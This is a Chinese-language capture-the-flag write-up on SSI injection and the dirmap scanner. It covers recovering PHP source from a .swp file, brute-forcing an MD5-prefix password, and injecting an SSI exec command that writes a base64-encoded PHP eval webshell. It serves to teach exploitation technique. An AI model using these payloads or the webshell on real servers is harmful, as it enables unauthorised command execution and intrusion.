青梦建站南宁网

写一篇文章来学习一下 ssi 注入 以及 dirmap 工具的使用

看到这两个框框没什么想法，边探索边扫下目录吧。显示前端报错，先禁用了js，然后又尝试抓了下包，没有发现什么，只好看看扫出来的目录了，最终扫出来了的:
index.php.swp （用dirmap扫出来的）

成功得到源码：

<?phpob_start();function get_hash(){$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times$content = uniqid().$random;return sha1($content); }header("Content-Type: text/html;charset=utf-8");***if(isset($_POST['username']) and $_POST['username'] != '' ){$admin = '6d0bc1';if ( $admin == substr(md5($_POST['password']),0,6)) {echo "<script>alert('[+] Welcome to manage system')</script>";$file_shtml = "public/".get_hash().".shtml";$shtml = fopen($file_shtml, "w") or die("Unable to open file!");$text = '******<h1>Hello,'.$_POST['username'].'</h1>******';fwrite($shtml,$text);fclose($shtml);***echo "[!] Header  error ...";} else {echo "<script>alert('[!] Failed')</script>";}else{***}***
?>

虽然两个都显示username,但只有第一个才是真正的$_POST[username]

看一下代码逻辑：

1.首先判断输入的password 的前6位是否为6d0bc1

2.如果满足的话就执行打开文件、写入文件、关闭文件的功能

但是我想着，最终是要读flag的，但这里的东西即使绕过了貌似也是读不到的（一开始我是这样想的，但后面接触了ssi注入，就想到在text这块会有注入）

先来绕过

一、脚本爆破password

from hashlib import md5test='6d0bc1'
for i in range(100000000):if md5(str(i).encode('utf-8')).hexdigest()[:6]==test:print(i)

可以得到 password:2020666 

username不为空就行

最终在包中找到：
 

访问该路径，可以看到：

这里的123就是注入点了

二、ssi注入

ssi注入：服务器包含注入。ssi可以赋予html静态页面的动态效果，通过ssi可以执行相应的命令。

 ssi注入的格式为：

<!--#exec cmd="命令"-->

返回index.php尝试注入

成功访问到：
 

但这样一条条命令执行有些麻烦，尝试写入一句话木马

<?php @eval($_POST['cmd']);?>

 但直接传入是不行的，需要进行base64加密，所以payload就变成了

username=<!--#exec cmd="echo PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSkgPz4=|base64 -d> shell.php"-->&password=2020666 

回到index.php，先抓包，得到public下的路径，访问phtml执行代码，然后再试试public下的shell.php是否存在

此时已成功执行代码，访问shell.php

发现没报错，getshell

最终找到了flag

flag{4ea3197e-d677-4436-a0db-d53adaa9c131}